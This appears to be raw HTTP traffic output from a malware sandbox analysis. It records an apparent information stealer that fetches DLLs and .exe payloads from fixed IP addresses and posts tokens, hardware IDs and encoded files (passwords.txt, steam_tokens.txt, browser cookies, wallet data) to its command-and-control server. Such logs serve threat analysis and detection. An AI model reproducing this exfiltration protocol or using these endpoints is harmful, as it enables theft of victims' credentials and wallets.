Source: global traffic HTTP traffic detected: GET /1309cdeb8f4c8736/freebl3.dll HTTP/1.1Host: 46.8.231.109Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /1309cdeb8f4c8736/mozglue.dll HTTP/1.1Host: 46.8.231.109Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /1309cdeb8f4c8736/msvcp140.dll HTTP/1.1Host: 46.8.231.109Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /1309cdeb8f4c8736/msvcp140.dll HTTP/1.1Host: 46.8.231.109Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /1309cdeb8f4c8736/nss3.dll HTTP/1.1Host: 46.8.231.109Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /1309cdeb8f4c8736/softokn3.dll HTTP/1.1Host: 46.8.231.109Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /1309cdeb8f4c8736/vcruntime140.dll HTTP/1.1Host: 46.8.231.109Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /c4754d4f680ead72.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DAKEBAKFHCFHIEBFBAFBHost: 46.8.231.109Content-Length: 947Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /c4754d4f680ead72.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AFBFHDBKJEGHJJJKFIIJHost: 46.8.231.109Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 46 42 46 48 44 42 4b 4a 45 47 48 4a 4a 4a 4b 46 49 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 62 38 62 65 64 36 63 61 39 36 35 65 38 38 36 34 39 33 30 61 63 38 38 32 65 35 66 38 64 61 37 61 30 33 30 63 63 39 39 66 65 64 34 39 30 63 64 64 65 33 66 62 39 39 33 33 35 33 31 34 66 37 30 39 32 38 38 36 35 66 32 0d 0a 2d 2d 2d 2d 2d 2d 41 46 42 46 48 44 42 4b 4a 45 47 48 4a 4a 4a 4b 46 49 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 41 46 42 46 48 44 42 4b 4a 45 47 48 4a 4a 4a 4b 46 49 49 4a 2d 2d 0d 0a Data Ascii: ------AFBFHDBKJEGHJJJKFIIJContent-Disposition: form-data; name="token"8b8bed6ca965e8864930ac882e5f8da7a030cc99fed490cdde3fb99335314f70928865f2------AFBFHDBKJEGHJJJKFIIJContent-Disposition: form-data; name="message"wallets------AFBFHDBKJEGHJJJKFIIJ--
Source: global traffic HTTP traffic detected: POST /c4754d4f680ead72.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CAAKKFHCFIECAAAKEGCFHost: 46.8.231.109Content-Length: 265Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 41 41 4b 4b 46 48 43 46 49 45 43 41 41 41 4b 45 47 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 62 38 62 65 64 36 63 61 39 36 35 65 38 38 36 34 39 33 30 61 63 38 38 32 65 35 66 38 64 61 37 61 30 33 30 63 63 39 39 66 65 64 34 39 30 63 64 64 65 33 66 62 39 39 33 33 35 33 31 34 66 37 30 39 32 38 38 36 35 66 32 0d 0a 2d 2d 2d 2d 2d 2d 43 41 41 4b 4b 46 48 43 46 49 45 43 41 41 41 4b 45 47 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 43 41 41 4b 4b 46 48 43 46 49 45 43 41 41 41 4b 45 47 43 46 2d 2d 0d 0a Data Ascii: ------CAAKKFHCFIECAAAKEGCFContent-Disposition: form-data; name="token"8b8bed6ca965e8864930ac882e5f8da7a030cc99fed490cdde3fb99335314f70928865f2------CAAKKFHCFIECAAAKEGCFContent-Disposition: form-data; name="message"files------CAAKKFHCFIECAAAKEGCF--
Source: global traffic HTTP traffic detected: POST /c4754d4f680ead72.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HDGCAAFBFBKFIDGDHJDBHost: 46.8.231.109Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 44 47 43 41 41 46 42 46 42 4b 46 49 44 47 44 48 4a 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 62 38 62 65 64 36 63 61 39 36 35 65 38 38 36 34 39 33 30 61 63 38 38 32 65 35 66 38 64 61 37 61 30 33 30 63 63 39 39 66 65 64 34 39 30 63 64 64 65 33 66 62 39 39 33 33 35 33 31 34 66 37 30 39 32 38 38 36 35 66 32 0d 0a 2d 2d 2d 2d 2d 2d 48 44 47 43 41 41 46 42 46 42 4b 46 49 44 47 44 48 4a 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 48 44 47 43 41 41 46 42 46 42 4b 46 49 44 47 44 48 4a 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 48 44 47 43 41 41 46 42 46 42 4b 46 49 44 47 44 48 4a 44 42 2d 2d 0d 0a Data Ascii: ------HDGCAAFBFBKFIDGDHJDBContent-Disposition: form-data; name="token"8b8bed6ca965e8864930ac882e5f8da7a030cc99fed490cdde3fb99335314f70928865f2------HDGCAAFBFBKFIDGDHJDBContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------HDGCAAFBFBKFIDGDHJDBContent-Disposition: form-data; name="file"------HDGCAAFBFBKFIDGDHJDB--
Source: global traffic HTTP traffic detected: POST /c4754d4f680ead72.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EHJDHJKFIECAAKFIJJKJHost: 46.8.231.109Content-Length: 272Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 48 4a 44 48 4a 4b 46 49 45 43 41 41 4b 46 49 4a 4a 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 62 38 62 65 64 36 63 61 39 36 35 65 38 38 36 34 39 33 30 61 63 38 38 32 65 35 66 38 64 61 37 61 30 33 30 63 63 39 39 66 65 64 34 39 30 63 64 64 65 33 66 62 39 39 33 33 35 33 31 34 66 37 30 39 32 38 38 36 35 66 32 0d 0a 2d 2d 2d 2d 2d 2d 45 48 4a 44 48 4a 4b 46 49 45 43 41 41 4b 46 49 4a 4a 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 79 62 6e 63 62 68 79 6c 65 70 6d 65 0d 0a 2d 2d 2d 2d 2d 2d 45 48 4a 44 48 4a 4b 46 49 45 43 41 41 4b 46 49 4a 4a 4b 4a 2d 2d 0d 0a Data Ascii: ------EHJDHJKFIECAAKFIJJKJContent-Disposition: form-data; name="token"8b8bed6ca965e8864930ac882e5f8da7a030cc99fed490cdde3fb99335314f70928865f2------EHJDHJKFIECAAKFIJJKJContent-Disposition: form-data; name="message"ybncbhylepme------EHJDHJKFIECAAKFIJJKJ--
Source: global traffic HTTP traffic detected: GET /prog/66d70775c548d_v.exe HTTP/1.1Host: 147.45.44.104Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /prog/66d7077a2064d_l.exe HTTP/1.1Host: 147.45.44.104Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /c4754d4f680ead72.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GCGHCBKFCFBFHIDHDBFCHost: 46.8.231.109Content-Length: 272Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 43 47 48 43 42 4b 46 43 46 42 46 48 49 44 48 44 42 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 62 38 62 65 64 36 63 61 39 36 35 65 38 38 36 34 39 33 30 61 63 38 38 32 65 35 66 38 64 61 37 61 30 33 30 63 63 39 39 66 65 64 34 39 30 63 64 64 65 33 66 62 39 39 33 33 35 33 31 34 66 37 30 39 32 38 38 36 35 66 32 0d 0a 2d 2d 2d 2d 2d 2d 47 43 47 48 43 42 4b 46 43 46 42 46 48 49 44 48 44 42 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 6b 6b 6a 71 61 69 61 78 6b 68 62 0d 0a 2d 2d 2d 2d 2d 2d 47 43 47 48 43 42 4b 46 43 46 42 46 48 49 44 48 44 42 46 43 2d 2d 0d 0a Data Ascii: ------GCGHCBKFCFBFHIDHDBFCContent-Disposition: form-data; name="token"8b8bed6ca965e8864930ac882e5f8da7a030cc99fed490cdde3fb99335314f70928865f2------GCGHCBKFCFBFHIDHDBFCContent-Disposition: form-data; name="message"wkkjqaiaxkhb------GCGHCBKFCFBFHIDHDBFC--
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 147.45.68.138Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----JDGIIJJDHDGCGDHIJDAKHost: 147.45.68.138Content-Length: 256Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 44 47 49 49 4a 4a 44 48 44 47 43 47 44 48 49 4a 44 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 32 42 43 34 44 36 34 38 39 46 42 34 31 30 39 33 35 33 31 37 31 2d 61 33 33 63 37 33 34 30 2d 36 31 63 61 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 47 49 49 4a 4a 44 48 44 47 43 47 44 48 49 4a 44 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 36 65 65 62 35 64 66 66 31 64 34 37 39 64 30 38 32 66 37 37 66 32 63 39 30 31 37 63 33 62 66 35 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 47 49 49 4a 4a 44 48 44 47 43 47 44 48 49 4a 44 41 4b 2d 2d 0d 0a Data Ascii: ------JDGIIJJDHDGCGDHIJDAKContent-Disposition: form-data; name="hwid"62BC4D6489FB4109353171-a33c7340-61ca------JDGIIJJDHDGCGDHIJDAKContent-Disposition: form-data; name="build_id"6eeb5dff1d479d082f77f2c9017c3bf5------JDGIIJJDHDGCGDHIJDAK--
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----DBKEHDGDGHCBGCAKFIIIHost: 147.45.68.138Content-Length: 331Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 42 4b 45 48 44 47 44 47 48 43 42 47 43 41 4b 46 49 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 35 35 64 62 32 32 31 62 65 38 65 66 63 36 31 66 63 62 32 64 66 62 64 62 31 61 64 32 64 30 38 0d 0a 2d 2d 2d 2d 2d 2d 44 42 4b 45 48 44 47 44 47 48 43 42 47 43 41 4b 46 49 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 36 65 65 62 35 64 66 66 31 64 34 37 39 64 30 38 32 66 37 37 66 32 63 39 30 31 37 63 33 62 66 35 0d 0a 2d 2d 2d 2d 2d 2d 44 42 4b 45 48 44 47 44 47 48 43 42 47 43 41 4b 46 49 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 6f 64 65 22 0d 0a 0d 0a 31 0d 0a 2d 2d 2d 2d 2d 2d 44 42 4b 45 48 44 47 44 47 48 43 42 47 43 41 4b 46 49 49 49 2d 2d 0d 0a Data Ascii: ------DBKEHDGDGHCBGCAKFIIIContent-Disposition: form-data; name="token"d55db221be8efc61fcb2dfbdb1ad2d08------DBKEHDGDGHCBGCAKFIIIContent-Disposition: form-data; name="build_id"6eeb5dff1d479d082f77f2c9017c3bf5------DBKEHDGDGHCBGCAKFIIIContent-Disposition: form-data; name="mode"1------DBKEHDGDGHCBGCAKFIII--
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----DHIJEHJDHJKECBFHDHDHHost: 147.45.68.138Content-Length: 331Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 48 49 4a 45 48 4a 44 48 4a 4b 45 43 42 46 48 44 48 44 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 35 35 64 62 32 32 31 62 65 38 65 66 63 36 31 66 63 62 32 64 66 62 64 62 31 61 64 32 64 30 38 0d 0a 2d 2d 2d 2d 2d 2d 44 48 49 4a 45 48 4a 44 48 4a 4b 45 43 42 46 48 44 48 44 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 36 65 65 62 35 64 66 66 31 64 34 37 39 64 30 38 32 66 37 37 66 32 63 39 30 31 37 63 33 62 66 35 0d 0a 2d 2d 2d 2d 2d 2d 44 48 49 4a 45 48 4a 44 48 4a 4b 45 43 42 46 48 44 48 44 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 6f 64 65 22 0d 0a 0d 0a 32 0d 0a 2d 2d 2d 2d 2d 2d 44 48 49 4a 45 48 4a 44 48 4a 4b 45 43 42 46 48 44 48 44 48 2d 2d 0d 0a Data Ascii: ------DHIJEHJDHJKECBFHDHDHContent-Disposition: form-data; name="token"d55db221be8efc61fcb2dfbdb1ad2d08------DHIJEHJDHJKECBFHDHDHContent-Disposition: form-data; name="build_id"6eeb5dff1d479d082f77f2c9017c3bf5------DHIJEHJDHJKECBFHDHDHContent-Disposition: form-data; name="mode"2------DHIJEHJDHJKECBFHDHDH--
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----HJJJJKEHCAKFBFHJKEHCHost: 147.45.68.138Content-Length: 332Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 4a 4a 4a 4a 4b 45 48 43 41 4b 46 42 46 48 4a 4b 45 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 35 35 64 62 32 32 31 62 65 38 65 66 63 36 31 66 63 62 32 64 66 62 64 62 31 61 64 32 64 30 38 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 4a 4a 4a 4b 45 48 43 41 4b 46 42 46 48 4a 4b 45 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 36 65 65 62 35 64 66 66 31 64 34 37 39 64 30 38 32 66 37 37 66 32 63 39 30 31 37 63 33 62 66 35 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 4a 4a 4a 4b 45 48 43 41 4b 46 42 46 48 4a 4b 45 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 6f 64 65 22 0d 0a 0d 0a 32 31 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 4a 4a 4a 4b 45 48 43 41 4b 46 42 46 48 4a 4b 45 48 43 2d 2d 0d 0a Data Ascii: ------HJJJJKEHCAKFBFHJKEHCContent-Disposition: form-data; name="token"d55db221be8efc61fcb2dfbdb1ad2d08------HJJJJKEHCAKFBFHJKEHCContent-Disposition: form-data; name="build_id"6eeb5dff1d479d082f77f2c9017c3bf5------HJJJJKEHCAKFBFHJKEHCContent-Disposition: form-data; name="mode"21------HJJJJKEHCAKFBFHJKEHC--
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----IDBFHJDAAFBAKEBGIJKKHost: 147.45.68.138Content-Length: 5773Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /sql.dll HTTP/1.1Host: 147.45.68.138Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----IEBAAFCAFCBKFHJJJKKFHost: 147.45.68.138Content-Length: 829Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 45 42 41 41 46 43 41 46 43 42 4b 46 48 4a 4a 4a 4b 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 35 35 64 62 32 32 31 62 65 38 65 66 63 36 31 66 63 62 32 64 66 62 64 62 31 61 64 32 64 30 38 0d 0a 2d 2d 2d 2d 2d 2d 49 45 42 41 41 46 43 41 46 43 42 4b 46 48 4a 4a 4a 4b 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 36 65 65 62 35 64 66 66 31 64 34 37 39 64 30 38 32 66 37 37 66 32 63 39 30 31 37 63 33 62 66 35 0d 0a 2d 2d 2d 2d 2d 2d 49 45 42 41 41 46 43 41 46 43 42 4b 46 48 4a 4a 4a 4b 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 51 32 39 76 61 32 6c 6c 63 31 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 58 30 52 6c 5a 6d 46 31 62 48 51 75 64 48 68 30 0d 0a 2d 2d 2d 2d 2d 2d 49 45 42 41 41 46 43 41 46 43 42 4b 46 48 4a 4a 4a 4b 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 64 61 74 61 22 0d 0a 0d 0a 4c 6d 64 76 62 32 64 73 5a 53 35 6a 62 32 30 4a 52 6b 46 4d 55 30 55 4a 4c 77 6c 47 51 55 78 54 52 51 6b 78 4e 7a 45 79 4d 6a 6b 77 4f 44 41 79 43 55 35 4a 52 41 6b 31 4d 54 45 39 56 55 4a 6c 54 6b 4e 72 57 6a 4e 4d 4f 48 6c 59 59 33 67 34 63 57 67 30 53 6b 5a 56 57 47 74 33 61 30 35 44 4f 55 6c 79 5a 47 6c 53 5a 47 4a 71 55 31 52 71 63 56 4e 70 52 6d 67 34 56 33 4a 53 59 32 4a 4c 63 6c 39 79 54 30 70 69 5a 30 68 5a 4e 6c 52 42 4e 46 4a 55 4c 54 5a 77 63 7a 42 69 61 47 56 74 5a 6e 64 44 55 45 4a 7a 54 45 31 6e 55 46 51 33 4c 57 64 55 59 31 64 78 53 48 5a 61 64 6c 70 69 59 57 5a 50 63 47 74 78 55 6e 6b 77 5a 45 78 35 57 55 63 35 51 57 70 51 4d 6e 5a 69 56 55 4a 76 62 57 46 79 62 6d 4d 35 63 47 4e 61 56 6d 78 6f 53 47 74 56 5a 56 56 68 56 30 31 31 63 6b 51 77 52 30 64 59 65 56 63 77 4e 56 39 43 58 7a 46 4a 65 56 56 4f 57 55 56 46 54 47 31 35 63 56 4a 6e 43 69 35 6e 62 32 39 6e 62 47 55 75 59 32 39 74 43 56 52 53 56 55 55 4a 4c 77 6c 47 51 55 78 54 52 51 6b 78 4e 6a 6b 35 4d 44 63 78 4e 6a 51 77 43 54 46 51 58 30 70 42 55 67 6b 79 4d 44 49 7a 4c 54 45 77 4c 54 41 31 4c 54 41 32 43 67 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 49 45 42 41 41 46 43 41 46 43 42 4b 46 48 4a 4a 4a 4b 4b 46 2d 2d 0d 0a Data Ascii: ------IEBAAFCAFCBKFHJJJKKFContent-Disposition: form-data; name="token"d55db221be8efc61fcb2dfbdb1ad2d08------IEBAAFCAFCBKFHJJJKKFContent-Disposition: form-data; name="build_id"6eeb5dff1d479d082f77f2c9017c3bf5------IEBAAFCAFCBKFHJJJKKFContent-Disposition: form-data; name="file_name"Q29va2ll
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----DAKEHIJJKEGIDHIEHDAFHost: 147.45.68.138Content-Length: 437Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 41 4b 45 48 49 4a 4a 4b 45 47 49 44 48 49 45 48 44 41 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 35 35 64 62 32 32 31 62 65 38 65 66 63 36 31 66 63 62 32 64 66 62 64 62 31 61 64 32 64 30 38 0d 0a 2d 2d 2d 2d 2d 2d 44 41 4b 45 48 49 4a 4a 4b 45 47 49 44 48 49 45 48 44 41 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 36 65 65 62 35 64 66 66 31 64 34 37 39 64 30 38 32 66 37 37 66 32 63 39 30 31 37 63 33 62 66 35 0d 0a 2d 2d 2d 2d 2d 2d 44 41 4b 45 48 49 4a 4a 4b 45 47 49 44 48 49 45 48 44 41 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 47 46 7a 63 33 64 76 63 6d 52 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 44 41 4b 45 48 49 4a 4a 4b 45 47 49 44 48 49 45 48 44 41 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 64 61 74 61 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 44 41 4b 45 48 49 4a 4a 4b 45 47 49 44 48 49 45 48 44 41 46 2d 2d 0d 0a Data Ascii: ------DAKEHIJJKEGIDHIEHDAFContent-Disposition: form-data; name="token"d55db221be8efc61fcb2dfbdb1ad2d08------DAKEHIJJKEGIDHIEHDAFContent-Disposition: form-data; name="build_id"6eeb5dff1d479d082f77f2c9017c3bf5------DAKEHIJJKEGIDHIEHDAFContent-Disposition: form-data; name="file_name"cGFzc3dvcmRzLnR4dA==------DAKEHIJJKEGIDHIEHDAFContent-Disposition: form-data; name="file_data"------DAKEHIJJKEGIDHIEHDAF--
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----HCBGDGCAAKJEBFIDBAAAHost: 147.45.68.138Content-Length: 437Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 43 42 47 44 47 43 41 41 4b 4a 45 42 46 49 44 42 41 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 35 35 64 62 32 32 31 62 65 38 65 66 63 36 31 66 63 62 32 64 66 62 64 62 31 61 64 32 64 30 38 0d 0a 2d 2d 2d 2d 2d 2d 48 43 42 47 44 47 43 41 41 4b 4a 45 42 46 49 44 42 41 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 36 65 65 62 35 64 66 66 31 64 34 37 39 64 30 38 32 66 37 37 66 32 63 39 30 31 37 63 33 62 66 35 0d 0a 2d 2d 2d 2d 2d 2d 48 43 42 47 44 47 43 41 41 4b 4a 45 42 46 49 44 42 41 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 47 46 7a 63 33 64 76 63 6d 52 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 48 43 42 47 44 47 43 41 41 4b 4a 45 42 46 49 44 42 41 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 64 61 74 61 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 48 43 42 47 44 47 43 41 41 4b 4a 45 42 46 49 44 42 41 41 41 2d 2d 0d 0a Data Ascii: ------HCBGDGCAAKJEBFIDBAAAContent-Disposition: form-data; name="token"d55db221be8efc61fcb2dfbdb1ad2d08------HCBGDGCAAKJEBFIDBAAAContent-Disposition: form-data; name="build_id"6eeb5dff1d479d082f77f2c9017c3bf5------HCBGDGCAAKJEBFIDBAAAContent-Disposition: form-data; name="file_name"cGFzc3dvcmRzLnR4dA==------HCBGDGCAAKJEBFIDBAAAContent-Disposition: form-data; name="file_data"------HCBGDGCAAKJEBFIDBAAA--
